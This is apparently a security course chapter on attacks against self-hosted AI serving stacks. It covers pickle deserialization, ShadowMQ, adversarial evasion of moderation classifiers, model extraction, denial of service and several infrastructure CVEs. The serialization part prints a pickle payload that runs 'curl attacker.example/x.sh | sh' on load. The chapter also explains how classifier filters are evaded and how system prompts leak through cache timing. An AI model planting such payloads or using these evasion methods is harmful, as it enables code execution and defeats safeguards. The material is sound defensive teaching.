4. Model and Infrastructure Attacks

Introduction

A healthcare startup deploys a self-hosted diagnostic AI model on their internal servers – a deliberate choice for data sovereignty and compliance. They download a popular open-source model from a well-known hub, load it into their inference server, and begin processing patient data. Three weeks later, their security team detects unusual outbound network traffic from the inference server. Investigation reveals that the model file contained a serialization exploit: when the model was loaded, it silently established a reverse shell to an attacker-controlled server. The attacker has had access to the model’s runtime environment – and potentially patient data – for three weeks.

Note what did not happen. Nobody sent a prompt. No guardrail was bypassed, no jailbreak was crafted, and the model never generated a single token. The compromise happened at torch.load(), before inference began. Every attack in Sections 2 and 3 needed the model to run; this one only needed it to be loaded.

That difference is a consequence of a decision the learner already made. Chapter 1’s control-ownership table showed that moving from a cloud API to self-hosting transfers rate limiting, moderation, logging and patching the serving stack onto you – none of which arrive with the weights. This section is what lives in those columns once they are yours: the model file, the loader, the container, the GPU, the cache, the orchestrator, and the API in front of all of it.

What will I get out of this?

By the end of this section, you will be able to:

  1. Explain why deserializing data executes code, and identify which parts of a serving stack still deserialize untrusted input after a safetensors migration.
  2. Distinguish adversarial perturbation from prompt injection, and place it in MITRE ATLAS given that OWASP has no matching category.
  3. Determine whether a deployment is exposed to model extraction by reading what its API returns.
  4. Trace an unbounded-consumption attack from request to invoice, and name the control that caps it.
  5. Assess the stack below the model – container runtime, GPU, prefix cache, orchestrator – as attack surface, using the 2025 incidents in each layer as reference cases.
  6. Prioritise these five families against a real deployment on prerequisite access, severity, and cost to fix.

Serialization Exploits

LLM04: Supply Chain

Chapter 1 Section 3 established the rule: pickle executes arbitrary code on load, safetensors cannot, so prefer safetensors and treat a pickle-only repository as a finding. Take that as given. This section answers the two questions it left open – why deserializing is executing, and what else in your stack deserializes once the weights file is safe.

Why Loading Is Running

A pickle file is not a data structure. It is a program for a small stack machine built into Python, and pickle.load() is its interpreter. Most of its instructions build objects, but two of them – GLOBAL and REDUCE – look up a named callable in any importable module and call it with supplied arguments.

That is the whole vulnerability. Any Python object can define a __reduce__ method that tells pickle how to rebuild it, in the form “call this function with these arguments.” An attacker writes a class whose __reduce__ returns os.system and a command string. Pickle faithfully does as instructed:

# The attacker's side -- roughly 4 lines
import pickle, os

class Payload:
    def __reduce__(self):
        # "To rebuild me, call os.system with this argument"
        return (os.system, ("curl attacker.example/x.sh | sh",))

pickle.dump(Payload(), open("innocent_looking.bin", "wb"))
# The victim's side -- one line, and the payload has already run
weights = torch.load("innocent_looking.bin")   # RCE here

There is no parser bug to patch and no malformed input to reject. The file is valid and pickle is behaving exactly as documented. This is why the mitigation is a format change rather than a fix: you cannot make a code-execution feature safe by validating its inputs.

Two consequences follow that people routinely get wrong:

  • The payload runs before the load finishes. Malicious opcodes placed at the head of the stream execute first. A torch.load() that ends in a traceback tells you nothing about whether code ran – the exact evasion behind the nullifAI models on Hugging Face in Section 3.
  • Scanning is a filter, not a boundary. A scanner must parse the archive to inspect the stream. Change the compression and it cannot, and it reports nothing rather than reporting failure.

The Part Safetensors Does Not Fix

A safetensors migration secures the weights, not the stack

Safetensors removes code execution from one file: the tensor blob. It does nothing about the other places an AI serving stack deserializes untrusted input – the tokenizer and config files bundled alongside the weights, the custom-code paths (trust_remote_code=True) that fetch and execute Python from a hub repository, the pickle-backed cache and checkpoint formats in training tooling, and the one that turned out to matter most: inter-process communication inside the inference server itself.

In October 2024, Oligo Security disclosed that Meta’s Llama Stack deserialized ZeroMQ messages with recv_pyobj() – a convenience method that runs the received bytes through pickle. Anyone who could reach the socket had remote code execution. That became CVE-2024-50050, the case study below.

The interesting part is what happened next. Over the following year the same recv_pyobj() call was found in vLLM, NVIDIA TensorRT-LLM, SGLang, Modular’s Max Server, and Microsoft’s Sarathi-Serve. It had not been independently reinvented – it was copied. SGLang’s vulnerable file opens with the comment “Adapted from vLLM.” Oligo published the cluster as ShadowMQ in November 2025.

graph TB
    subgraph P["Two paths to the same primitive"]
      direction LR
      A["Model file<br/>(pickle checkpoint)"] -->|"torch.load()"| C
      B["IPC message<br/>(ZeroMQ socket)"] -->|"recv_pyobj()"| C
      C["pickle interprets<br/>GLOBAL + REDUCE"]
    end
    C --> D["Arbitrary code, with the<br/>inference server's privileges"]
    D --> E["Reverse shell · credential theft<br/>weight exfiltration · cryptominer"]

    F["safetensors<br/>migration"] -.->|"closes"| A
    F -.->|"does NOT close"| B

    style A fill:#8b0000,color:#fff
    style B fill:#8b0000,color:#fff
    style D fill:#8b0000,color:#fff
    style E fill:#8b0000,color:#fff
    style F fill:#2d5016,color:#fff
The pattern to carry forward

The question is not “do we load untrusted models.” It is “what in our serving stack calls a deserializer on input it did not produce.” For a self-hosted deployment the honest answer includes the model file, the tokenizer, any remote code the repository ships, and every internal socket between the scheduler and the workers. ShadowMQ is also a reminder that inference servers are young software: the same bug class propagated through five projects by copy-paste, so your exposure is not bounded by your own code review. Dependency auditing and version pinning across the serving stack sit in Layer 2; keeping the internal sockets unreachable is Layer 3’s endpoint hardening.


Adversarial Perturbation

Framework note: this one has no OWASP number

Every other attack in this chapter maps to an OWASP LLM Top 10 category. This one does not. Adversarial perturbation predates the LLM era, targets the model’s decision boundary rather than its instruction handling, and sits outside the scope of all ten 2026 entries.

Its canonical identifier is MITRE ATLAS AML.T0043 – Craft Adversarial Data, with sub-techniques AML.T0043.000 (white-box optimization, full model access) and AML.T0043.001 (black-box transfer, craft against a proxy model and carry it over). This is the framework-selection judgement Section 1 asked you to make in practice: when OWASP has no slot for a technique, that is not a sign the technique is unimportant – it is a sign you are holding the wrong reference work.

Machine learning models partition a high-dimensional space into regions and label them. An adversarial input is one moved just far enough across a boundary to change its label, while staying close enough to the original that a human sees no meaningful difference. The classic demonstration is visual – a handful of altered pixels turning a stop sign into a speed-limit sign for an image classifier – and the mathematics is identical for any differentiable model.

For LLM deployments, the technique matters in a way that is easy to miss. Your input filter is a model too.

Chapter 1 Section 3 described the guardrail stack: input moderation, refusal training, output moderation, application policy. The first and third of those layers are usually small classifiers – and a classifier has decision boundaries that can be optimised against. An attacker with query access to your moderation endpoint can search for a phrasing that the classifier scores as benign while the main model still reads it as an instruction. The payload is unchanged in meaning; only its position relative to the classifier’s boundary moves.

Where the two attack classes meet

This is a different mechanism from the filter-evasion families in Section 2, and the distinction is worth holding. Encoding, Unicode smuggling and cross-modal payloads defeat a filter by making it look at the wrong bytes. Adversarial perturbation defeats a filter that is looking at exactly the right bytes and classifying them wrongly.

The practical consequence is the same in both cases and is the reason Chapter 3 does not treat filtering as a boundary: a model-based filter in front of a model inherits every weakness of a model. Defence-in-depth here means layered response validation rather than a better classifier.


Model Extraction

LLM06: Unbounded Consumption (model extraction)

Model extraction steals a model’s behaviour rather than its file. The attacker never touches the weights: they query the API, record what comes back, and train a local model on the pairs. The result is a distilled approximation that runs without rate limits, without per-token billing, and without terms of service.

Extraction vs. exfiltration – two different problems

Keep these apart, because the controls have nothing in common.

  • Extraction (this section) copies behaviour through the API. The prerequisite is query access. It is invisible to file-integrity controls, because no file moves.
  • Exfiltration copies the weights off a host. The prerequisite is access to storage or a device. This is the dominant risk for small models at the edge, where the file is measured in gigabytes and the host belongs to someone else – covered in Section 7.
sequenceDiagram
    participant Attacker
    participant TargetAPI as Target Model API
    participant Local as Local Training Env
    participant Clone as Cloned Model

    Attacker->>TargetAPI: 1. Send strategic query inputs
    TargetAPI-->>Attacker: 2. Return outputs (+ logprobs, if exposed)
    Attacker->>Attacker: 3. Repeat across a broad input distribution
    Attacker->>Local: 4. Feed input-output pairs as training data
    Local->>Clone: 5. Train distilled model to replicate behaviour
    Attacker->>Clone: 6. Query the clone -- no rate limits, no costs, no logs

What Your API Has To Expose For This To Work

Extraction efficiency is set by how much information each query returns, which makes this assessable rather than theoretical. Read your own endpoint configuration against this list:

What the API returns What it gives the attacker Queries needed
Token log-probabilities or full distributions The model’s confidence across alternatives – a far richer training signal than the text alone Fewest – orders of magnitude fewer
Deterministic output at temperature 0 A clean, reproducible label per input Few
Sampled text only, with rate limits and a spend cap One noisy label per query, at a metered cost Many, and the bill is visible

The mitigation is legible from the table: do not expose log-probabilities on a public endpoint unless a customer use case requires it, and treat sustained high-volume querying across a suspiciously broad input distribution as an abuse signal rather than a good customer. Both are Layer 5 controls.

Why It Matters

  • IP theft: organizations spend heavily to train proprietary models; extraction transfers the result for the price of the queries.
  • Adversarial research: a local copy can be attacked with full white-box access, and findings often transfer back to the original. This is AML.T0043.001 – the clone is the proxy model.
  • The clone is unobservable. Once it exists, the attacker’s experiments leave no trace in your logs. Every detection control you own stops applying.

Denial of Service

LLM06: Unbounded Consumption

LLM inference is expensive and asymmetric: a request costs the sender almost nothing to send and the operator real GPU seconds to serve. Attackers exploit the gap.

Attack Techniques

Prompt Flooding: high volumes of API requests to exhaust compute or accumulate billing charges. Crude, and effective against anything without per-principal rate limiting.

Context Window Stuffing: inputs crafted to maximise context usage. A 200,000-token request costs dramatically more to serve than a 100-token one, and because attention cost grows faster than linearly in sequence length, the ratio is worse than the token count suggests. Repeated maximum-length requests exhaust GPU memory and evict other users’ work from the batch.

Recursive Generation: prompts that induce very long outputs – exhaustive enumerations, or self-referential instructions that keep the model generating until it hits the token cap. The attacker pays for one short prompt and the operator pays for a full-length completion.

Multi-Turn Resource Drain: in agentic systems, a single prompt that triggers a long chain of tool calls, each consuming its own compute and quota. This is the shape that scales worst, because the amplification factor is the agent’s step budget rather than the attacker’s request count – see Section 5.

From Request to Invoice

The financial path is short, and every step on it is a place to intervene:

request accepted → no per-principal quota → admitted to the batch → no input length cap → served at maximum cost → no spend alert → discovered on the monthly bill

The load-bearing control is not a bigger cluster. It is a spend cap with an alert below it, because that is the only control that bounds the loss when every other one is missing. Multi-dimensional rate limiting – per key, per user, per endpoint, per token-count – sits in Layer 5; consumption anomaly detection sits in Layer 3’s posture management.

This is also the category that stolen credentials land in. In the Storm-2139 case from Section 1, the attackers did not need any of the techniques above – harvested API keys gave them consumption at the victim’s expense directly, and the victims found out from their bills.


Infrastructure Attacks

Everything so far targeted the model. This part targets the stack underneath it – and it is where a self-hosted deployment inherits the most work, because none of these components are AI-specific enough to be covered by AI-specific tooling.

graph TB
    U["Client request"] --> O
    O["Orchestrator<br/>(n8n, LangGraph, workflow engine)"] --> G
    G["API gateway<br/>auth · rate limits"] --> S
    S["Inference server<br/>(vLLM, TensorRT-LLM, Llama Stack)"] --> K
    K["Prefix / KV cache<br/>shared across requests"] --> R
    R["Container runtime<br/>(Docker, Kubernetes)"] --> H
    H["GPU + host kernel"]

    O -.->|"CVE-2025-68613<br/>expression injection RCE"| X1["Attacker owns the<br/>orchestrator and its<br/>trusted connections"]
    S -.->|"ShadowMQ<br/>pickle over IPC"| X2["RCE as the<br/>serving process"]
    K -.->|"CVE-2025-46570<br/>timing side channel"| X3["Another tenant's<br/>prompt, recovered"]
    R -.->|"CVE-2025-23266<br/>NVIDIAScape"| X4["Root on the host,<br/>all tenants on it"]

    style X1 fill:#8b0000,color:#fff
    style X2 fill:#8b0000,color:#fff
    style X3 fill:#8b0000,color:#fff
    style X4 fill:#8b0000,color:#fff

Container and Runtime Exploits

Inference servers almost always run in containers, so the container boundary is doing security work whether or not anyone designed it to. The AI-specific twist is that GPU access requires a privileged path through that boundary.

Reference case: NVIDIAScape (CVE-2025-23266)

Disclosed 17 July 2025, CVSS 9.0. The NVIDIA Container Toolkit’s createContainer OCI hook – which runs privileged, on the host, to wire up GPU devices – inherited environment variables from the container image. Setting LD_PRELOAD in the image made the privileged hook load a shared library from the container’s own filesystem, executing attacker code as root on the host.

The exploit is roughly three lines of Dockerfile. It needs no credentials, no kernel bug, and no GPU access – only the ability to get an image scheduled, which is precisely what a managed GPU or notebook service sells. Affected: Container Toolkit through v1.17.7; fixed in v1.17.8.

Why it generalises: the container boundary was never the security boundary people assumed. Anywhere GPU passthrough, device plugins, or privileged operators are involved, a container escape is a one-tenant-to-all-tenants event. Multi-tenant GPU isolation and runtime hardening are Layer 3; scanning the images before they are scheduled is Layer 2.

Shared State Between Requests

To serve many users economically, inference servers share things: the GPU, the batch, and – most consequentially – the prefix cache. Caching the computed attention state for a prompt prefix means a second request with the same opening does not recompute it. That is an enormous performance win, and it makes response time depend on what other people have asked.

Reference case: vLLM prefix-cache timing side channel (CVE-2025-46570)

Fixed in vLLM 0.9.0. When a request’s prefix chunks hit the cache, time-to-first-token drops measurably. An attacker sharing the backend submits a guess and times the response: fast means the prefix was already cached, so somebody else asked it.

Published research on LLM serving side channels reports cache hit/miss detection at 99% accuracy, and recovers a confidential system prompt token by token at roughly 111 queries per token – an entirely practical budget. The severity score assigned was low (CVSS 2.6) because a timing oracle is indirect; the recoverable asset is a system prompt or another tenant’s query.

Why it generalises: this is not a bug in the ordinary sense. It is a performance optimisation whose benefit and whose leak are the same mechanism, so it cannot be patched away – only mitigated, by scoping cache sharing (per-tenant caches, cache salting) and accepting the cost. Any cross-request optimisation in a multi-tenant AI system is a candidate side channel, and that reasoning is worth applying before the CVE exists.

The same reasoning covers the rest of the shared-state surface: GPU memory that is not zeroed between tenants, batch scheduling that lets one tenant’s request length shape another’s latency, and driver-level memory scraping across processes.

Orchestration and API Layers

The orchestrator is the highest-value target in the stack and usually the least hardened, because it is treated as internal tooling rather than as production infrastructure. It holds credentials for everything the AI system touches.

Teaching Moment: n8n CVE-2025-68613

n8n – the open-source workflow automation platform used widely as an AI agent orchestration layer, and the platform behind this course’s own labs – disclosed CVE-2025-68613 in December 2025, CVSS 9.9.

What it is: an authenticated remote code execution flaw, not a network or input-validation bug. n8n lets workflow authors write expressions that are evaluated when the workflow runs. Those expressions were evaluated in a context that was not sufficiently isolated from the Node.js runtime, so a crafted expression escaped the sandbox and reached core Node modules and global runtime objects – arbitrary OS command execution as the n8n process.

What it takes to exploit: an account that can create or edit a workflow. No administrative privilege. In most deployments that is the entire engineering team, plus anyone who obtained a session. Affected: 0.211.0 up to 1.120.4 / 1.121.1 / 1.122.0. More than 100,000 internet-exposed instances were observed at disclosure.

Why it matters for AI deployments: an orchestrator’s job is to hold every credential the AI system needs – model API keys, database connection strings, internal service tokens, cloud roles. RCE there is not one compromised application; it is the credential store for the whole AI estate, plus the network position from which those credentials are normally used. The attacker inherits the AI system’s trust relationships wholesale.

Key takeaway: the sandbox that separates “configuring a tool” from “running code on the server” is a security boundary, and in low-code and agentic platforms it is load-bearing and frequently thin. Treat workflow-edit permission as equivalent to shell access until proven otherwise. Orchestration hardening is Layer 3; getting a patch deployed before you can upgrade is Layer 6’s virtual patching.

The API layer in front of the model faces ordinary API risks with an unusual cost multiplier attached:

  • API key theft: a stolen key is unrestricted access to metered compute – the Storm-2139 pattern above.
  • Insufficient rate limiting: without per-user and per-endpoint limits, one principal can consume the whole cluster.
  • Missing authentication: internal model endpoints exposed with none, on the assumption that “internal” is a control. ShadowMQ is the counter-example from inside the same host.

Deployment Pipeline Supply Chain

Section 3 covered the artifact supply chain – hubs, datasets, adapters, packages. The pipeline that moves those artifacts into production is its own surface:

  • Compromised model registries: poisoning the internal registry or artifact store that deployment pulls from. The internal path typically has no signing and no scanning, because everything inside is implicitly trusted.
  • CI/CD pipeline attacks: injecting steps into the deployment pipeline – bypassing model validation, or modifying weights during packaging. The Ultralytics case below is exactly this.
  • Automated pull-by-name: deployment scripts that resolve a model or package by name at build time will happily resolve a typosquat, with no human present to notice.

Comparing the Five Families

Each attack above is described in isolation because that is how they are discovered. That is not how they are triaged. Read this table across, not down:

Attack Who needs what access Where it lands What the attacker gets How you detect it Cost to fix Blueprint layer
Serialization / pickle RCE Publish an artifact, or reach an internal socket Load time and IPC – before inference Code execution as the serving process; then everything else Egress anomalies from a serving host; format and provenance checks at the gate Low at the gate (format + pinning); very high once it has run L2 · Models
Adversarial perturbation Query access to the classifier you want to defeat Inference time, per request A payload your moderation layer scores as benign Hard – inputs look normal by construction; watch for probing patterns Medium – filter alone cannot close it; needs layered validation L5 · Access
Model extraction Ordinary API access, at volume Inference time, over a campaign A behavioural clone that is unobservable to you thereafter Volume and input-distribution anomalies per principal Low to prevent (hide logprobs, cap volume); irreversible once done L5 · Access
Unbounded consumption Any credential – often a stolen one Inference time, immediately Your compute budget, or denial of service to real users Spend and latency alerting; this one is loud Lowest – quotas and spend caps; damage is money, and recoverable L5 · Access
Infrastructure (runtime, cache, orchestrator) Schedule an image, share a backend, or edit a workflow Below the model, continuously Host root, another tenant’s prompts, or every credential you hold Standard infra telemetry – if AI hosts are in scope for it Medium – patching plus isolation and tenancy design L3 · Infrastructure

Three things fall out of reading it this way, and they are the section’s actual conclusion:

1 · Severity does not follow novelty. The most sophisticated attack here is extraction and the most damaging is a pickle file. Sort by what the attacker ends up holding – code execution beats a stolen clone beats a large bill – not by how interesting the technique is. This is the reasoning the quiz’s prioritisation question is testing.

2 · The cheap controls are almost all preventive, and they cluster. Format choice, version pinning, hidden logprobs, spend caps, and not exposing internal sockets are each close to free before deployment, and each becomes expensive or impossible afterwards. Extraction and RCE share a property that consumption does not: you cannot undo them. A bill can be paid; a clone cannot be recalled and a compromised host cannot be un-compromised.

3 · “Who needs what access” is the column that scopes your assessment. It converts an unanswerable question – are we exposed to infrastructure attacks? – into four answerable ones: who can get an image scheduled on our GPU nodes, who can edit a workflow in our orchestrator, who shares an inference backend with our tenants, and what does our public endpoint return besides text? Those are afternoon questions, and they are what Layer 2 and Layer 3 exist to close.


Case Study: ShadowMQ and CVE-2024-50050

Real-World Impact: One Unsafe Line, Copied Across the Inference Ecosystem

Who: discovered by Oligo Security; affected Meta’s Llama Stack, then vLLM, NVIDIA TensorRT-LLM, SGLang, Modular Max Server, and Microsoft’s Sarathi-Serve

When: CVE-2024-50050 disclosed October 2024; Oligo published the full cluster as ShadowMQ in November 2025

What happened: Llama Stack’s distribution server used ZeroMQ for communication between components and called recv_pyobj() to read messages. That method deserializes with pickle. Anyone who could send to the socket had remote code execution with the server’s privileges. Meta patched it in llama-stack 0.0.41 by replacing pickle with a type-safe Pydantic JSON implementation across the API.

How the same bug reached five more projects:

  1. recv_pyobj() is the convenient way to send a Python object over ZeroMQ, and its danger is not visible at the call site
  2. Inference servers solve near-identical scheduler-to-worker problems, so their IPC code was adapted between projects rather than written fresh
  3. SGLang’s vulnerable file opens with the comment “Adapted from vLLM” – the flaw travelled with the design
  4. The fixes diverged: vLLM (CVE-2025-30165) replaced the affected engine, NVIDIA (CVE-2025-23254) added HMAC validation, Modular (CVE-2025-60455) moved to msgpack. Sarathi-Serve was still unpatched at publication

OWASP mapping: LLM04: Supply Chain – the vulnerability is in the serving framework, not the model.

On the severity dispute: Meta scored CVE-2024-50050 at 6.3; Snyk scored the same flaw at 9.3. Both are defensible and the gap is about assumed reachability – is the ZeroMQ socket exposed, or safely internal? Read a vendor CVSS score as the vendor’s assumption about your deployment, and re-derive it against your own network. The 3-point spread is the difference between a patch-next-quarter ticket and an incident.

Lesson: two, and the second is the bigger one. First, serialization exploits are not confined to model files – safetensors does not protect a socket. Second, you inherit bug classes along the paths your dependencies were copied, not the paths your own code was reviewed. Ask your inference server the same question you ask a model file: what does it deserialize, and from whom?


Case Study: Ultralytics Supply Chain Attack (December 2024)

Real-World Impact: Compromised Twice in 36 Hours

Who: users of Ultralytics, the YOLO computer vision library – one of the most-downloaded packages in the Python AI ecosystem

When: December 2024

What happened: four PyPI releases were published carrying a cryptocurrency miner: v8.3.41 and v8.3.42, then – after the maintainers had already published a clean v8.3.43 – v8.3.45 and v8.3.46 as well. All four were pulled from PyPI.

How it worked:

  1. The publishing workflow used a custom GitHub Action that interpolated untrusted input – a branch name – into a shell command without sanitisation, giving script injection in CI
  2. The attacker used it to poison the build cache, so malicious code was inserted during the build that produced the PyPI artifact. The repository’s source was never modified, which is why reading the source would not have revealed it
  3. v8.3.41 and v8.3.42 shipped to PyPI and were installed by users and CI systems automatically
  4. Maintainers published v8.3.43 as a clean release
  5. Within 36 hours the attacker published two more malicious versions, this time straight to PyPI using an API token stolen from the compromised CI/CD run

OWASP mapping: LLM04: Supply Chain – compromised dependency in the AI development ecosystem.

Lesson: the usual takeaway – pin versions, verify checksums, audit dependencies – is right and insufficient, because pinning to v8.3.45 would have pinned you to malware. The specific lessons are sharper:

  • A clean release does not mean a clean pipeline. The remediation that mattered was rotating the publishing credentials, and it was the step that did not happen in time. Treat every secret reachable from a compromised CI run as compromised, and rotate before shipping the fix.
  • The artifact can be malicious while the source is clean. Build provenance and reproducibility are what close that gap; source review does not.
  • Your CI is production. A workflow that puts a branch name into a shell string is an RCE in a system that holds publishing credentials.

Dependency auditing and pipeline integrity are Layer 2 controls, and scanning what actually arrives – rather than what the repository says it should be – is model and artifact scanning.

Key Takeaways
  • Deserializing is executing. Pickle’s GLOBAL/REDUCE opcodes call any named function with supplied arguments, so a model file is a program and torch.load() is its interpreter. There is no input validation that fixes a code-execution feature – only a format change.
  • Safetensors secures the weights file, not the stack. ShadowMQ found the same recv_pyobj() pickle call in six inference servers because the code was copied between them. Ask what else in your serving stack deserializes input it did not produce – starting with the internal sockets.
  • Adversarial perturbation is the one attack here with no OWASP category (AML.T0043 in ATLAS). It matters most because your input filter is itself a model with decision boundaries – distinct from the filter-evasion families in Section 2, which defeat a filter by making it read the wrong bytes.
  • Model extraction is irreversible and then invisible. It needs only API access at volume, and log-probabilities cut the required queries by orders of magnitude. Once the clone exists, none of your detection applies to it.
  • Unbounded consumption is the loudest and cheapest to bound. A spend cap with an alert below it is the control that limits the loss when every other control is missing.
  • Below the model, 2025 supplied a case per layer: NVIDIAScape for the container runtime, the vLLM prefix-cache side channel for shared state, CVE-2025-68613 for the orchestrator. Two generalisations outlive the CVEs – a container boundary around GPU passthrough is a one-tenant-to-all-tenants risk, and any cross-request optimisation in a multi-tenant system is a candidate side channel.
  • Triage by what the attacker ends up holding, not by technique novelty: code execution beats a behavioural clone beats a large bill. The cheap controls are preventive and cluster before deployment; RCE and extraction cannot be undone afterwards.

Test Your Knowledge

Ready to test your understanding of model and infrastructure attacks? Head to the quiz to see how well you can identify serialization risks, extraction exposure, and the attack surface below the model – including a prioritisation call using the comparison table above.


Up next

Sections 1-4 covered the attack surface, prompt injection, data poisoning, and the model and infrastructure layers. Each one needed a component to be loaded, queried, or reached. In the next section the target starts making its own decisions: agentic attack vectors, where a system that can act turns a single successful injection into a chain of real-world actions – and where the resource-drain and excessive-agency threads from this section reappear with the amplification an autonomous step budget provides.